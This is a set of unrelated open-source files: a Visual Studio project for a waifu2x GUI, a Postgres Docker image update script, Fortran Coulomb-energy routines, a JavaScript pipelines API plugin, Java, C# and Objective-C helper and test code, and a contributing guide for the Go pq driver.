<?xml version="1.0" encoding="utf-8"?> <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup Label="ProjectConfigurations"> <ProjectConfiguration Include="Debug|Win32"> <Configuration>Debug</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Win32"> <Configuration>Release</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|x64"> <Configuration>Debug</Configuration> <Platform>x64</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|x64"> <Configuration>Release</Configuration> <Platform>x64</Platform> </ProjectConfiguration> </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{1FBC19A7-9FF0-4BA3-915C-993BADD7D080}</ProjectGuid> <RootNamespace>waifu2x_snowshell</RootNamespace> <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>true</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>false</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <WholeProgramOptimization>true</WholeProgramOptimization> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>true</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <CharacterSet>MultiByte</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>false</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <WholeProgramOptimization>true</WholeProgramOptimization> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <ImportGroup Label="ExtensionSettings"> </ImportGroup> <ImportGroup Label="Shared"> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <PropertyGroup Label="UserMacros" /> <PropertyGroup /> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>Disabled</Optimization> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> </ClCompile> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>Disabled</Optimization> <SDLCheck>true</SDLCheck> </ClCompile> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>MaxSpeed</Optimization> <FunctionLevelLinking>true</FunctionLevelLinking> <IntrinsicFunctions>true</IntrinsicFunctions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> </ClCompile> <Link> <EnableCOMDATFolding>true</EnableCOMDATFolding> <OptimizeReferences>true</OptimizeReferences> <AdditionalManifestDependencies>type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*';%(AdditionalManifestDependencies)</AdditionalManifestDependencies> <EntryPointSymbol>wWinMainCRTStartup</EntryPointSymbol> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>MaxSpeed</Optimization> <FunctionLevelLinking>true</FunctionLevelLinking> <IntrinsicFunctions>true</IntrinsicFunctions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> </ClCompile> <Link> <EnableCOMDATFolding>true</EnableCOMDATFolding> <OptimizeReferences>true</OptimizeReferences> </Link> </ItemDefinitionGroup> <ItemGroup> <ClCompile Include="Converter.cpp" /> <ClCompile Include="ConvertOption.cpp" /> <ClCompile Include="LocaleString.cpp" /> <ClCompile Include="SnowSetting.cpp" /> <ClCompile Include="Main.cpp" /> </ItemGroup> <ItemGroup> <ClInclude Include="Converter.h" /> <ClInclude Include="ConvertOption.h" /> <ClInclude Include="LocaleString.h" /> <ClInclude Include="Main.h" /> <ClInclude Include="resource.h" /> <ClInclude Include="SnowSetting.h" /> </ItemGroup> <ItemGroup> <ResourceCompile Include="waifu2x_snowshell.rc" /> </ItemGroup> <ItemGroup> <Image Include="Bitmap\BG.bmp" /> <Image Include="Bitmap\BG_Japanese.bmp" /> <Image Include="Bitmap\BG_Korean.bmp" /> <Image Include="Bitmap\BG_Chinese.bmp" /> <Image Include="Bitmap\BG_Portuguese.bmp" /> <Image Include="Bitmap\ICON.ico" /> </ItemGroup> <ItemGroup> <None Include="Lang\Chinese.ini" /> <None Include="Lang\English.ini" /> <None Include="Lang\German.ini" /> <None Include="Lang\Japanese.ini" /> <None Include="Lang\Korean.ini" /> <None Include="Lang\Portuguese.ini" /> <None Include="Lang\Swedish.ini" /> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> </ImportGroup> </Project>
{ "pile_set_name": "Github" }
#!/bin/bash set -Eeuo pipefail cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" versions=( "$@" ) if [ ${#versions[@]} -eq 0 ]; then versions=( */ ) fi versions=( "${versions[@]%/}" ) defaultDebianSuite='buster-slim' declare -A debianSuite=( # https://github.com/docker-library/postgres/issues/582 [9.4]='stretch-slim' [9.5]='stretch-slim' [9.6]='stretch-slim' [10]='stretch-slim' [11]='stretch-slim' ) defaultAlpineVersion='3.12' declare -A alpineVersion=( #[9.6]='3.5' ) packagesBase='http://apt.postgresql.org/pub/repos/apt/dists/' declare -A suitePackageList=() suiteVersionPackageList=() suiteArches=() _raw_package_list() { local suite="$1"; shift local component="$1"; shift local arch="$1"; shift curl -fsSL "$packagesBase/$suite-pgdg/$component/binary-$arch/Packages.bz2" | bunzip2 } fetch_suite_package_list() { local suite="$1"; shift local version="$1"; shift local arch="$1"; shift # normal (GA) releases end up in the "main" component of upstream's repository if [ -z "${suitePackageList["$suite-$arch"]:+isset}" ]; then local suiteArchPackageList suiteArchPackageList="$(_raw_package_list "$suite" 'main' "$arch")" suitePackageList["$suite-$arch"]="$suiteArchPackageList" fi # ... but pre-release versions (betas, etc) end up in the "PG_MAJOR" component (so we need to check both) if [ -z "${suiteVersionPackageList["$suite-$version-$arch"]:+isset}" ]; then local versionPackageList versionPackageList="$(_raw_package_list "$suite" "$version" "$arch")" suiteVersionPackageList["$suite-$version-$arch"]="$versionPackageList" fi } awk_package_list() { local suite="$1"; shift local version="$1"; shift local arch="$1"; shift awk -F ': ' -v version="$version" "$@" <<<"${suitePackageList["$suite-$arch"]}"$'\n'"${suiteVersionPackageList["$suite-$version-$arch"]}" } fetch_suite_arches() { local suite="$1"; shift if [ -z "${suiteArches["$suite"]:+isset}" ]; then local suiteRelease suiteRelease="$(curl -fsSL "$packagesBase/$suite-pgdg/Release")" suiteArches["$suite"]="$(gawk <<<"$suiteRelease" -F ':[[:space:]]+' '$1 == "Architectures" { print $2; exit }')" fi } for version in "${versions[@]}"; do tag="${debianSuite[$version]:-$defaultDebianSuite}" suite="${tag%%-slim}" majorVersion="${version%%.*}" fetch_suite_package_list "$suite" "$version" 'amd64' fullVersion="$( awk_package_list "$suite" "$version" 'amd64' ' $1 == "Package" { pkg = $2 } $1 == "Version" && pkg == "postgresql-" version { print $2; exit } ' )" if [ -z "$fullVersion" ]; then echo >&2 "error: missing postgresql-$version package!" exit 1 fi fetch_suite_arches "$suite" versionArches= for arch in ${suiteArches["$suite"]}; do fetch_suite_package_list "$suite" "$version" "$arch" archVersion="$( awk_package_list "$suite" "$version" "$arch" ' $1 == "Package" { pkg = $2 } $1 == "Version" && pkg == "postgresql-" version { print $2; exit } ' )" if [ "$archVersion" = "$fullVersion" ]; then [ -z "$versionArches" ] || versionArches+=' | ' versionArches+="$arch" fi done echo "$version: $fullVersion ($versionArches)" cp docker-entrypoint.sh "$version/" sed -e 's/%%PG_MAJOR%%/'"$version"'/g;' \ -e 's/%%PG_VERSION%%/'"$fullVersion"'/g' \ -e 's/%%DEBIAN_TAG%%/'"$tag"'/g' \ -e 's/%%DEBIAN_SUITE%%/'"$suite"'/g' \ -e 's/%%ARCH_LIST%%/'"$versionArches"'/g' \ Dockerfile-debian.template \ > "$version/Dockerfile" if [ "$majorVersion" = '9' ]; then sed -i -e 's/WALDIR/XLOGDIR/g' \ -e 's/waldir/xlogdir/g' \ "$version/docker-entrypoint.sh" # ICU support was introduced in PostgreSQL 10 (https://www.postgresql.org/docs/10/static/release-10.html#id-1.11.6.9.5.13) sed -i -e '/icu/d' "$version/Dockerfile" else # postgresql-contrib-10 package does not exist, but is provided by postgresql-10 # Packages.gz: # Package: postgresql-10 # Provides: postgresql-contrib-10 sed -i -e '/postgresql-contrib-/d' "$version/Dockerfile" fi if [ "$majorVersion" != '13' ]; then sed -i -e '/DEBIAN_FRONTEND/d' "$version/Dockerfile" fi # TODO figure out what to do with odd version numbers here, like release candidates srcVersion="${fullVersion%%-*}" # change "10~beta1" to "10beta1" for ftp urls tilde='~' srcVersion="${srcVersion//$tilde/}" srcSha256="$(curl -fsSL "https://ftp.postgresql.org/pub/source/v${srcVersion}/postgresql-${srcVersion}.tar.bz2.sha256" | cut -d' ' -f1)" for variant in alpine; do if [ ! -d "$version/$variant" ]; then continue fi cp docker-entrypoint.sh "$version/$variant/" sed -i 's/gosu/su-exec/g' "$version/$variant/docker-entrypoint.sh" sed -e 's/%%PG_MAJOR%%/'"$version"'/g' \ -e 's/%%PG_VERSION%%/'"$srcVersion"'/g' \ -e 's/%%PG_SHA256%%/'"$srcSha256"'/g' \ -e 's/%%ALPINE-VERSION%%/'"${alpineVersion[$version]:-$defaultAlpineVersion}"'/g' \ "Dockerfile-$variant.template" \ > "$version/$variant/Dockerfile" if [ "$majorVersion" = '9' ]; then sed -i -e 's/WALDIR/XLOGDIR/g' \ -e 's/waldir/xlogdir/g' \ "$version/$variant/docker-entrypoint.sh" # ICU support was introduced in PostgreSQL 10 (https://www.postgresql.org/docs/10/static/release-10.html#id-1.11.6.9.5.13) sed -i -e '/icu/d' "$version/$variant/Dockerfile" fi if [ "$majorVersion" -gt 11 ]; then sed -i '/backwards compat/d' "$version/$variant/Dockerfile" fi if [ "$majorVersion" -lt 11 ]; then # JIT / LLVM is only supported in PostgreSQL 11+ (https://github.com/docker-library/postgres/issues/475) sed -i '/llvm/d' "$version/$variant/Dockerfile" fi done done
{ "pile_set_name": "Github" }
* * $Id$ * subroutine c_coulomb_init() implicit none #include "bafdecls.fh" #include "c_coulomb_common.fh" * **** local variables **** integer npack0,nfft3d,G(3) integer i,j,k integer zero,qzero,pzero,taskid integer nx,ny real*8 fourpi,gg logical value integer tmp1(2) * **** external functions **** * real*8 G(nfft3d,3) integer c_G_indx external c_G_indx call nwpw_timing_start(7) call C3dB_nfft3d(1,nfft3d) call Cram_npack(0,npack0) G(1) = c_G_indx(1) G(2) = c_G_indx(2) G(3) = c_G_indx(3) * **** allocate vc memory **** value = BA_alloc_get(mt_dbl,npack0,'vc',vc_hndl,vc_indx) if (.not. value) > call errquit('c_coulomb_init:out of heap memory',0,0) value = BA_push_get(mt_dbl,nfft3d,'tmp1',tmp1(2),tmp1(1)) if (.not. value) > call errquit('c_coulomb_init:out of stack memory',0,0) call Parallel3d_taskid_i(taskid) call C3dB_nx(1,nx) call C3dB_ny(1,ny) * ***** find the G==0 point in the lattice ***** i=0 j=0 k=0 c call C3dB_ktoqp(1,k+1,qzero,pzero) c zero = (qzero-1)*(nx)*ny c > + j*(nx) c > + i+1 call C3dB_ijktoindexp(1,i+1,j+1,k+1,zero,pzero) * ***** form Vc = 4*pi/G**2 ***** fourpi = 4.0d0*(4.0d0*datan(1.0d0)) do i = 1,nfft3d gg = ( dbl_mb(G(1)+i-1)*dbl_mb(G(1)+i-1) > + dbl_mb(G(2)+i-1)*dbl_mb(G(2)+i-1) > + dbl_mb(G(3)+i-1)*dbl_mb(G(3)+i-1) ) if ((pzero.eq.taskid) .and. (i.eq.zero)) then dbl_mb(tmp1(1)+i-1) = 0.0d0 else dbl_mb(tmp1(1)+i-1) = fourpi/gg end if end do call Cram_r_pack(0,dbl_mb(tmp1(1))) call Cram_r_Copy(0,dbl_mb(tmp1(1)),dbl_mb(vc_indx)) value = BA_pop_stack(tmp1(2)) call nwpw_timing_end(7) return end subroutine c_coulomb_end() implicit none #include "bafdecls.fh" #include "c_coulomb_common.fh" logical value value = BA_free_heap(vc_hndl) return end subroutine c_coulomb_v(dng,vc_out) implicit none complex*16 dng(*) complex*16 vc_out(*) #include "bafdecls.fh" #include "c_coulomb_common.fh" call nwpw_timing_start(7) call Cram_rc_Mul(0,dbl_mb(vc_indx),dng,vc_out) call nwpw_timing_end(7) return end real*8 function c_coulomb_e(dng) implicit none complex*16 dng(*) #include "bafdecls.fh" #include "c_coulomb_common.fh" * **** local variables **** integer npack0 real*8 ec c real*8 tmp1(*) integer tmp1(2) logical value * **** external functions **** real*8 lattice_omega external lattice_omega call nwpw_timing_start(7) call Cram_npack(0,npack0) value = BA_push_get(mt_dbl,npack0,'tmp1',tmp1(2),tmp1(1)) if (.not. value) > call errquit('c_coulomb_e:out of stack memory',0,0) call Cram_cr_Sqr(0,dng,dbl_mb(tmp1(1))) call Cram_rr_dot(0,dbl_mb(tmp1(1)),dbl_mb(vc_indx),ec) ec = 0.5d0*ec*lattice_omega() value = BA_pop_stack(tmp1(2)) call nwpw_timing_end(7) c_coulomb_e = ec return end subroutine c_coulomb_euv(dng,euv) implicit none complex*16 dng(*) real*8 euv(3,3) #include "bafdecls.fh" #include "errquit.fh" #include "c_coulomb_common.fh" * **** local variables **** integer npack0,nfft3d,G(2,3) integer i,j integer u,v,s logical value real*8 pi,fourpi,scal,ss,sum real*8 hm(3,3),Bus(3,3),ecoul integer tmp1(2),tmp2(2) * **** external functions **** integer c_G_indx external c_G_indx real*8 lattice_unitg,lattice_omega,c_coulomb_e external lattice_unitg,lattice_omega,c_coulomb_e pi = 4.0d0*datan(1.0d0) fourpi = 4.0d0*pi scal = 1.0d0/(2.0d0*pi) * *** define hm **** do j=1,3 do i=1,3 hm(i,j) = scal*lattice_unitg(i,j) end do end do call C3dB_nfft3d(1,nfft3d) call Cram_npack(0,npack0) value = BA_push_get(mt_dbl,nfft3d, > 'G1',G(2,1),G(1,1)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,nfft3d, > 'G2',G(2,2),G(1,2)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,nfft3d, > 'G3',G(2,3),G(1,3)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,npack0,'tmp1',tmp1(2),tmp1(1)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,npack0,'tmp2',tmp2(2),tmp2(1)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) call dcopy(nfft3d,dbl_mb(c_G_indx(1)),1,dbl_mb(G(1,1)),1) call dcopy(nfft3d,dbl_mb(c_G_indx(2)),1,dbl_mb(G(1,2)),1) call dcopy(nfft3d,dbl_mb(c_G_indx(3)),1,dbl_mb(G(1,3)),1) call Cram_r_pack(0,dbl_mb(G(1,1))) call Cram_r_pack(0,dbl_mb(G(1,2))) call Cram_r_pack(0,dbl_mb(G(1,3))) * **** tmp2(G) = (n(G)**2) * (4*pi/G**2)**2 **** call Cram_cr_Sqr(0,dng,dbl_mb(tmp1(1))) call Cram_rr_Mul(0,dbl_mb(tmp1(1)),dbl_mb(vc_indx), > dbl_mb(tmp2(1))) c call Cram_rr_Mul(0,dbl_mb(tmp2(1)),dbl_mb(vc_indx), c > dbl_mb(tmp2(1))) call Cram_rr_Mul2(0,dbl_mb(vc_indx),dbl_mb(tmp2(1))) * **** Bus = Sum(G) (omega/4*pi)*tmp2(G)*Gu*Gs **** call dcopy(9,0.0d0,0,Bus,1) ss = lattice_omega()/fourpi do u=1,3 do s=u,3 call Cram_rr_Mul(0,dbl_mb(G(1,u)), > dbl_mb(G(1,s)), > dbl_mb(tmp1(1))) call Cram_rr_dot(0,dbl_mb(tmp1(1)),dbl_mb(tmp2(1)),sum) Bus(u,s) = ss*sum end do end do do u=1,3 do s=u+1,3 Bus(s,u) = Bus(u,s) end do end do ecoul = c_coulomb_e(dng) do v=1,3 do u=1,3 euv(u,v) = -ecoul*hm(u,v) do s=1,3 euv(u,v) = euv(u,v) + Bus(u,s)*hm(s,v) end do end do end do value = BA_pop_stack(tmp2(2)) value = BA_pop_stack(tmp1(2)) value = BA_pop_stack(G(2,3)) value = BA_pop_stack(G(2,2)) value = BA_pop_stack(G(2,1)) return end
{ "pile_set_name": "Github" }
'use strict'; const createRoute = require('./create'); const updateRoute = require('./update'); const removeRoute = require('./remove'); const syncRoute = require('./sync'); const syncWebhooksRoute = require('./syncWebhooks'); const syncPRsRoute = require('./syncPRs'); const getRoute = require('./get'); const listRoute = require('./list'); const badgeRoute = require('./badge'); const jobBadgeRoute = require('./jobBadge'); const listJobsRoute = require('./listJobs'); const listTriggersRoute = require('./listTriggers'); const listSecretsRoute = require('./listSecrets'); const listEventsRoute = require('./listEvents'); const startAllRoute = require('./startAll'); const createToken = require('./tokens/create'); const updateToken = require('./tokens/update'); const refreshToken = require('./tokens/refresh'); const listTokens = require('./tokens/list'); const removeToken = require('./tokens/remove'); const removeAllTokens = require('./tokens/removeAll'); const metricsRoute = require('./metrics'); const latestBuild = require('./latestBuild'); const getAdmin = require('./admins/get'); const deleteCache = require('./caches/delete'); const openPrRoute = require('./openPr'); /** * Pipeline API Plugin * @method register * @param {Hapi} server Hapi Server */ const pipelinesPlugin = { name: 'pipelines', async register(server) { const statusColor = { unknown: 'lightgrey', disabled: 'lightgrey', created: 'lightgrey', success: 'green', queued: 'blue', blocked: 'blue', running: 'blue', collapsed: 'lightgrey', frozen: 'lightgrey', unstable: 'yellow', failure: 'red', aborted: 'red' }; /** * Returns an encoded string of subject based on separator of the badge service * @method encodeBadgeSubject * @param {String} badgeService badge service url * @param {String} subject subject to put in the badge * @return {String} encodedSubject */ server.expose('encodeBadgeSubject', ({ badgeService, subject }) => { const separator = badgeService.match(/}}(.){{/)[1]; if (separator === '/') { return encodeURIComponent(subject); } // Reference: https://shields.io/ if (separator === '-') { return subject.replace(/-/g, '--').replace(/_/g, '__'); } return subject; }); /** * Returns true if the scope does not include pipeline or includes pipeline * and it's pipelineId matches the pipeline, otherwise returns false * @method isValidToken * @param {String} id ID of pipeline * @param {Object} credentials Credential object from Hapi * @param {String} credentials.pipelineId ID of pipeline which the token is allowed to access * @param {String} credentials.scope Scope whose token is allowed */ server.expose( 'isValidToken', (id, credentials) => !credentials.scope.includes('pipeline') || parseInt(id, 10) === parseInt(credentials.pipelineId, 10) ); server.route([ createRoute(), removeRoute(), updateRoute(), syncRoute(), syncWebhooksRoute(), syncPRsRoute(), getRoute(), listRoute(), badgeRoute({ statusColor }), jobBadgeRoute({ statusColor }), listJobsRoute(), listTriggersRoute(), listSecretsRoute(), listEventsRoute(), startAllRoute(), updateToken(), refreshToken(), createToken(), listTokens(), removeToken(), removeAllTokens(), metricsRoute(), latestBuild(), getAdmin(), deleteCache(), openPrRoute() ]); } }; module.exports = pipelinesPlugin;
{ "pile_set_name": "Github" }
package com.company.mvc.helper; import java.util.Observable; import java.util.Observer; /** * @author cbf4Life [email protected] * I'm glad to share my knowledge with you all. */ public class Checker implements Observer{ //使用哪一个策略 private IXmlValidate validate; //xml配置文件的路径 String xmlPath; //无参构造 public Checker(){ //读取web.xml配置文件,获得使用哪一个检验策略 this(null); } //构造函数传递 public Checker(IXmlValidate _validate){ this.validate = _validate; } public void setXmlPath(String _xmlPath){ this.xmlPath = _xmlPath; } //检查 public boolean check(){ return validate.validate(xmlPath); } public void update(Observable arg0, Object arg1) { //检查是否符合条件 arg1 = check(); } }
{ "pile_set_name": "Github" }
using System; using System.Linq; using LinqToTwitter; using LinqToTwitterPcl.Tests.Common; using LitJson; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace LinqToTwitterPcl.Tests.GeoTests { [TestClass] public class GeoTests { public GeoTests() { TestCulture.SetCulture(); } [TestMethod] public void Geo_Ctor_Parses_JsonData() { var geoJson = JsonMapper.ToObject(ReverseResponse); var geo = new Geo(geoJson); Assert.IsNotNull(geo.Places); var places = geo.Places; Assert.AreEqual(4, places.Count); Assert.AreEqual("neighborhood", places.First().PlaceType); } [TestMethod] public void Geo_Ctor_Returns_On_Null_JsonData() { var geo = new Geo((JsonData)null); Assert.IsNull(geo.Places); } const string ReverseResponse = @"{ ""query"":{ ""type"":""reverse_geocode"", ""params"":{ ""accuracy"":0, ""granularity"":""neighborhood"", ""coordinates"":{ ""type"":""Point"", ""coordinates"":[ -122.4006, 37.78215 ] } }, ""url"":""http:\/\/api.twitter.com\/1\/geo\/reverse_geocode.json?long=-122.4006&accuracy=0&granularity=neighborhood&lat=37.78215"" }, ""result"":{ ""places"":[ { ""contained_within"":[ { ""country"":""United States"", ""place_type"":""city"", ""name"":""San Francisco"", ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -122.51368188, 37.70813196 ], [ -122.35845384, 37.70813196 ], [ -122.35845384, 37.83245301 ], [ -122.51368188, 37.83245301 ] ] ] }, ""attributes"":{ }, ""full_name"":""San Francisco, CA"", ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/5a110d312052166f.json"", ""id"":""5a110d312052166f"" } ], ""place_type"":""neighborhood"", ""country"":""United States"", ""name"":""SoMa"", ""full_name"":""SoMa, San Francisco"", ""attributes"":{ }, ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -122.42284884, 37.76893497 ], [ -122.3964, 37.76893497 ], [ -122.3964, 37.78752897 ], [ -122.42284884, 37.78752897 ] ] ] }, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/2b6ff8c22edd9576.json"", ""id"":""2b6ff8c22edd9576"" }, { ""contained_within"":[ { ""country"":""United States"", ""place_type"":""admin"", ""name"":""California"", ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -124.482003, 32.528832 ], [ -114.131211, 32.528832 ], [ -114.131211, 42.009517 ], [ -124.482003, 42.009517 ] ] ] }, ""attributes"":{ }, ""full_name"":""California, US"", ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/fbd6d2f5a4e4a15e.json"", ""id"":""fbd6d2f5a4e4a15e"" } ], ""place_type"":""city"", ""country"":""United States"", ""name"":""San Francisco"", ""full_name"":""San Francisco, CA"", ""attributes"":{ }, ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -122.51368188, 37.70813196 ], [ -122.35845384, 37.70813196 ], [ -122.35845384, 37.83245301 ], [ -122.51368188, 37.83245301 ] ] ] }, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/5a110d312052166f.json"", ""id"":""5a110d312052166f"" }, { ""contained_within"":[ { ""country"":""United States"", ""place_type"":""country"", ""name"":""United States"", ""bounding_box"":null, ""attributes"":{ }, ""full_name"":""United States"", ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/96683cc9126741d1.json"", ""id"":""96683cc9126741d1"" } ], ""place_type"":""admin"", ""country"":""United States"", ""name"":""California"", ""full_name"":""California, US"", ""attributes"":{ }, ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -124.482003, 32.528832 ], [ -114.131211, 32.528832 ], [ -114.131211, 42.009517 ], [ -124.482003, 42.009517 ] ] ] }, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/fbd6d2f5a4e4a15e.json"", ""id"":""fbd6d2f5a4e4a15e"" }, { ""contained_within"":[ ], ""place_type"":""country"", ""country"":""United States"", ""name"":""United States"", ""full_name"":""United States"", ""attributes"":{ }, ""bounding_box"":null, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/96683cc9126741d1.json"", ""id"":""96683cc9126741d1"" } ] } }"; } }
{ "pile_set_name": "Github" }
// // USAdditions.h // WSDLParser // // Created by John Ogle on 9/5/08. // Copyright 2008 LightSPEED Technologies. All rights reserved. // Modified by Matthew Faupel on 2009-05-06 to use NSDate instead of NSCalendarDate (for iPhone compatibility). // Modifications copyright (c) 2009 Micropraxis Ltd. // NSData (MBBase64) category taken from "MiloBird" at http://www.cocoadev.com/index.pl?BaseSixtyFour // #import <Foundation/Foundation.h> #import <libxml/tree.h> @interface NSString (USAdditions) - (NSString *)stringByEscapingXML; - (NSString *)stringByUnescapingXML; - (const xmlChar *)xmlString; - (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix; + (NSString *)deserializeNode:(xmlNodePtr)cur; @end @interface NSNumber (USAdditions) - (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix; + (NSNumber *)deserializeNode:(xmlNodePtr)cur; @end @interface NSDate (USAdditions) - (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix; + (NSDate *)deserializeNode:(xmlNodePtr)cur; @end @interface NSData (USAdditions) - (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix; + (NSData *)deserializeNode:(xmlNodePtr)cur; @end @interface NSData (MBBase64) + (id)dataWithBase64EncodedString:(NSString *)string; // Padding '=' characters are optional. Whitespace is ignored. - (NSString *)base64Encoding; @end @interface USBoolean : NSObject { BOOL value; } @property (assign) BOOL boolValue; - (id)initWithBool:(BOOL)aValue; - (NSString *)stringValue; - (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix; + (USBoolean *)deserializeNode:(xmlNodePtr)cur; @end @interface SOAPFault : NSObject { NSString *faultcode; NSString *faultstring; NSString *faultactor; NSString *detail; } @property (nonatomic, retain) NSString *faultcode; @property (nonatomic, retain) NSString *faultstring; @property (nonatomic, retain) NSString *faultactor; @property (nonatomic, retain) NSString *detail; @property (readonly) NSString *simpleFaultString; + (SOAPFault *)deserializeNode:(xmlNodePtr)cur; @end
{ "pile_set_name": "Github" }
## Contributing to pq `pq` has a backlog of pull requests, but contributions are still very much welcome. You can help with patch review, submitting bug reports, or adding new functionality. There is no formal style guide, but please conform to the style of existing code and general Go formatting conventions when submitting patches. ### Patch review Help review existing open pull requests by commenting on the code or proposed functionality. ### Bug reports We appreciate any bug reports, but especially ones with self-contained (doesn't depend on code outside of pq), minimal (can't be simplified further) test cases. It's especially helpful if you can submit a pull request with just the failing test case (you'll probably want to pattern it after the tests in [conn_test.go](https://github.com/lib/pq/blob/master/conn_test.go). ### New functionality There are a number of pending patches for new functionality, so additional feature patches will take a while to merge. Still, patches are generally reviewed based on usefulness and complexity in addition to time-in-queue, so if you have a knockout idea, take a shot. Feel free to open an issue discussion your proposed patch beforehand.
{ "pile_set_name": "Github" }
